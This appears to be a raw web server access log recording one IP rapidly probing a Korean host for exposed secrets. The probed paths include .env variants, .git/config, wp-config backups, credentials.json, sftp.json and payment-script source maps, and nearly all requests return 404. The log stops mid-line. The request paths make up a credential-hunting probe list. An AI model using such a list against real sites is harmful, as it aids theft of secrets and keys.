-[15/Feb/2026:00:18:11 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/payment/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:11 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/admin/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:12 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.example" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:12 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/core/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:12 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:12 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/stripe/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:13 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.production" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:13 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.bak" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:13 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.local" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:14 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/assets/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:14 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/app/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:14 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/config.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:15 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/docker/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:15 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/config.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:15 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/config.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:15 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/main.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:16 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/main.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:16 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/env.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:16 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/env.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:16 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/app.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:17 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/app.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:17 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/constants.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:17 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/constants.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:18 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/bundle.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:18 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/bundle.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:18 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/index.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:18 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/index.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:19 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/@vite/client" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:19 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/__env.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:19 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/__env.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:19 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/vendor.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:20 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/vendor.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:20 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/stripe.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:20 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/stripe.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:20 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/checkout.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:21 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/checkout.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:21 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/payment.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:22 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/payment.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:22 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/sw.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:22 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/sw.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:23 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/config.json" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:23 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/config.json.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:23 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/env.json" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:23 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/env.json.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:24 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.vite/manifest.json" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:25 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.vite/manifest.json.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:25 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.git/config" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:26 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.git/HEAD" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:26 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-config.php.bak" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:26 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-config.php.old" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:27 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-config.php.txt" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:27 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-config.php.save" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:27 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-config.php~" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:28 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-content/debug.log" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:28 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.dev" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:28 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.staging" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:29 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.backup" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:29 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.old" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:29 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.save" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:29 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/credentials.json" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:30 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/credentials.json.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:30 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.vscode/sftp.json" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:30 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.vscode/sftp.json.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:30 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/docker-compose.yml" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:31 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 185.177.72.60] [Length 2074] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:31 +0000] - - 400 - GET https asset.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-" -[15/Feb/2026:00:18:31 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 185.177.72.60] [Length 17770] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:32 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/js/app.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:32 +0000] - - 400 - GET https asset.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-" -[15/Feb/2026:00:18:32 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/index.html" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:32 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/checkout" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:32 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/robots.txt" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:32 +0000] - - 400 - GET https asset.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-" -[15/Feb/2026:00:18:33 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/sitemap.xml" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:33 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:33 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:33 +0000] - - 400 - GET https asset.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-" -[15/Feb/2026:00:18:33 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.vite" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:34 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/backend/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:34 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/laravel/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:34 +0000] - - 400 - GET https asset.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-" -[15/Feb/2026:00:18:34 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/payment/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:35 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/admin/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:35 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.example" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:35 +0000] - - 400 - GET https asset.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-" -[15/Feb/2026:00:18:35 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/core/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:35 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:36 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/stripe/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:36 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.production" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:36 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.bak" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:36 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.local" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:37 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/assets/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:37 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/app/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:37 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/config.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:37 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/docker/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:38 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/config.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:38 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/config.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:38 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/main.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:39 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/main.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:39 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/env.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:39 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/env.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:39 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/app.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:40 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/app.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:40 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/constants.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:40 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/constants.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:41 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/bundle.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:41 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/bundle.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:41 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/index.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:42 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/index.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:42 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/@vite/client" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:43 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/__env.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[15/Feb/2026:00:18:43 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/__env.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 